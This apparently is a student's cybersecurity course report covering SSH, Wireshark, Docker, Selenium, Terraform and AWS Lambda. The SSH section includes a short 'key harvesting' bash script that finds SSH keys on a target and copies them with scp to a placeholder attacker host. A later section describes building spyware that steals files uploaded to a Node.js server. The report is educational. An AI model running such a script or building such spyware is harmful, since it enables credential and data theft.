V.A's CL-CY-001 course work. Lv 3

CLCY Level 2 Report

31 / 3 / 2025

TASK : SSH

US Employee Outsourced His Job to China for 1/5th of His Salary?! At first, it sounds wild.. a guy in China remotely controlling a US employee’s computer?! But that’s exactly what we do daily with SSH.

What is SSH?

SSH (Secure Shell) lets you securely access and manage remote computers over the internet:

ssh user@server_ip

Common uses: servers, Git, cloud computing, remote administration. Before SSH, we had Telnet, which sent passwords in plaintext.. a hacker’s dream. SSH encrypts data, making it far more secure.

SSH Keys: Secure Authentication

Instead of passwords (which hackers can guess), SSH uses key pairs:

1. Generate a key pair (on your local machine):

   ssh-keygen -t ed25519
   

   This creates a private key (id_ed25519) and a public key (id_ed25519.pub).

2. Share the public key with the remote system:

   ssh-copy-id user@server_ip
   

   Now, you can log in without entering a password:

   ssh user@server_ip
   

SSH Key Harvesting

#!/bin/bash

TARGET="user@target_ip"
DEST="user@attacker_ip"

ssh "$TARGET" "find / -name 'id_rsa*' -o -name '*.pub' 2>/dev/null" > keys.txt
scp -r keys.txt "$DEST:/home/user/loot"

This script searches for SSH keys, copies them, and uploads them to an attacker’s server. Always protect your SSH keys!

TASK : WIRESHARK

Wireshark is an open-source packet analyzer widely used for network troubleshooting, security analysis, and protocol development. I used it to capture Wi-Fi traffic while logging into a vulnerable PHP application over HTTP. (username:"admin123", password:"admin123") Using the filter:

tcp contains "admin123"

I was able to retrieve credentials in plaintext!!! How scary

Cool features of the statistics menu:

1. HTTP Requests & Responses
   Found under Statistics > HTTP > Requests, this option tracks login attempts, POST/GET requests. Observing multiple POST requests to /login.php?, indicating a potential brute-force attack.

2. Conversations
   Located in Statistics > Conversations > TCP, this shows client-server interactions. Identifing repeated login attempts from a single IP address suggests suspicious activity.
   

3. IO Graph (Latency Analysis)
   Provides a graphical representation of round-trip times, helping detect network delays. Observing high latency indicates possible congestion or issues in the network.
   

4. Retransmissions & Duplicate ACKs
   These metrics help identify network congestion or attack attempts

   • Filter used:

   tcp.analysis.duplicate_ack || tcp.analysis.retransmission
   

   

TASK : DOCKER

If you're a software developer, you've probably heard the phrase:
"Wait... it works on my machine!" Most programming languages and packages frequently update with bug fixes and security patches. Unfortunately, the applications we build often require the exact same versions of these dependencies and even the same operating system to work properly.

What is Docker?

Docker is an open-source platform that allows developers to package applications and their dependencies into lightweight, portable containers.

Running a To-Do App with Docker

To pull the sample To-Do app from GitHub:

git clone https://github.com/docker/getting-started-todo-app
cd getting-started-todo-app

Now, without installing a single library or worrying about Node.js versions, you can run the app using:

docker compose up

This command starts the app inside a Docker container!!

Or...docker run, you can start it on port 3000:

docker run -d -p 3000:3000 getting-started-todo-app

Publishing the App to Docker Hub

To share Docker container on Docker Hub, follow these steps:

1. **Log in

   docker login
   

2. Tag local image

   docker tag getting-started-todo-app /getting-started-todo-app:latest
   

3. Push the image to the repository:

   docker push /getting-started-todo-app:latest
   

TASK : DOCKER SPYWARE

Spyware in Docker containers is particularly dangerous because it can operate stealthily within isolated environments. Docker’s containerization often limits visibility into internal processes, making it difficult for security tools to detect malicious activities. This enables spyware to silently steal sensitive data without raising alarms.

Implementation:

I created a spyware.js script designed to steal files uploaded to a Node.js server, saving them to a different folder. This script was then Dockerized, allowing it to run in an isolated environment.

TASK : WEB SCRAPING AND AUTOMATION

Web scraping is a powerful technique that automates data extraction from websites, eliminating the need for manual inspection of HTML elements. Instead of navigating through pages manually, automation tools like Selenium can interact with web pages just as a human would, clicking buttons, entering text, and extracting relevant information.

Selenium is widely used for browser automation and web testing, making it an excellent choice for tasks like retrieving real-time data from dynamic websites.

Implemetation:

For this project, I used Selenium to extract flight prices from the Ixigo booking website, automating the process of searching for flights and capturing relevant pricing details. Here’s the output:

TASK: TERRAFORM

Managing cloud infrastructure through a graphical interface becomes impractical at scale. Terraform automates resource provisioning using a declarative configuration language, reducing manual effort and improving consistency.

What is Terraform? Terraform is an infrastructure-as-code tool that provisions and manages cloud resources using a declarative configuration file.

Terraform Configuration (main.tf)

Terraform uses HCL (HashiCorp Configuration Language) or JSON to define resources. Configuration sets up an AWS EC2 instance:

After replacing ami with a valid ID for the region, execute:

terraform init     # Initializes Terraform and downloads provider plugins
terraform apply    # Creates the defined resources
terraform destroy  # Deletes all resources

Terraform handles infrastructure as code, ensuring version control and automation in cloud environments.

TASK : AWS LAMBDA

Amazon Web Services (AWS) offers various cloud services, including:

• IoT and Robotics Management: Tools to manage IoT devices and robots remotely.
• EC2 (Elastic Compute Cloud): A scalable virtual server for running applications in the cloud.
• S3 (Simple Storage Service) : A storage service used by large companies like Netflix for content distribution.
• Lambda: A serverless compute service that runs code in response to events, automatically scaling infrastructure.

Implementation (Lambda):

1. Function Creation:
   A Lambda function named ChatAppHandler was created to handle the application logic. The code was written within the Lambda environment using AWS's tools.
2. API Gateway Setup:
   API Gateway exposes Lambda functions through HTTP endpoints, enabling requests with methods like GET, POST, PUT, and DELETE. WebSockets can also be used for real-time communication, with methods like $connect, $disconnect, and $default.

1. Stages and Deployment:
   The API Gateway was configured with stages for deployment management, and the service was deployed to make it live and accessible.
2. Testing:
   After deployment, the system was tested by verifying the flow from receiving an HTTP request to executing the Lambda function.

Click here for Part 2